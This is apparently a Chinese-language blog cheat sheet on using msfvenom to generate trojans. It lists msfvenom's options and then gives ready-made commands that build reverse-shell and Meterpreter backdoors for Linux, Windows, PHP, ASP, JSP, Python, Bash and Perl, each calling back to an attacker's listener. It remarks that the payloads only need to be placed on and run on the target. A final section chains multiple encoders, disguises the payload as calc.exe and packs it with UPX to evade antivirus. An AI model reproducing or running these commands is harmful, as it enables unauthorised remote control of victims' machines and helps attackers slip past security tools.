利用msfvenom生成木马

(Updated: )
Tools
,

0x00 msfvenom简介

image-20200505211453615

中文版

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
Options:
-p,  --payload    <payload>       指定需要使用的 payload (攻击荷载)。如果需要使用自定义的payload,请使用 &#039;-&#039;或者 stdin 指定
-l,  --list       [module_type]        列出指定模块的所有可用资源,模块类型包括:payload、encoders、nops、all
-n,  --nopsled    <length>         为payload预先指定一个NOP滑动长度
-f,  --format     <format>          指定输入格式(使用 --help-formats 来获取msf支持的输出格式列表)
-e,  --encoder    [encoder]        指定需要使用的encoder(编码器)
-a,  --arch       <architecture>   指定payload的目标架构,这里是x86是32位,x64是64位
-platform         <platform>       指定payload的目标平台
-s,  --space      <length>           设定有效攻击荷载的最大长度
-b,  --bad-chars  <list>             设定规避字符集,比如:&#039\x00\xff&#039
-i,  --iterations <count>            指定payload的编码次数
-c,  --add-code   <path>          指定一个附加的win32 shellcode文件
-x,  --template   <path>           指定一个自定义的可执行文件作为模板
-k,  --keep                                 保护模板程序的动作,注入的payload作为一个新的进程运行
--payload-options                    列举payload的标准选项
-o,  --out        <path>              保存payload
-v,  --var-name   <name>        指定一个自定义的变量,以确定输出格式
--shellest                                  最小化生成的payload
-h,  --help                                查看帮助选项
--help-formats                        查看msf支持的输出格式列表

0x01 常用命令

反弹shell命令

Linux

1
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

PHP

1
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.phpcat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP

1
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

Python

1
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash

1
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl

1
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

以上是基本的生成后门木马,只要想方设法放到目标机器上,并运行。在本地监听端口即可,但是你需要有一个公网的IP。

0x02 免杀

① 可以尝试多重编码

1
msfvenom -p windows/meterpreter/reverse_tcp lhost=<Your IP Address> lport=<Your Port to Connect On> -e x86/shikata_ga_nai -i 20 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f raw | msfvenom -e x86/shikata_ga_nai -a x86 --platform windows -i 10 -f raw | msfvenom -e x86/countdown -a x86 --platform windows -i 10 -x calc.exe -f exe -o shell.exe

② 对上述生成的木马进行upx加壳

1
upx shell.exe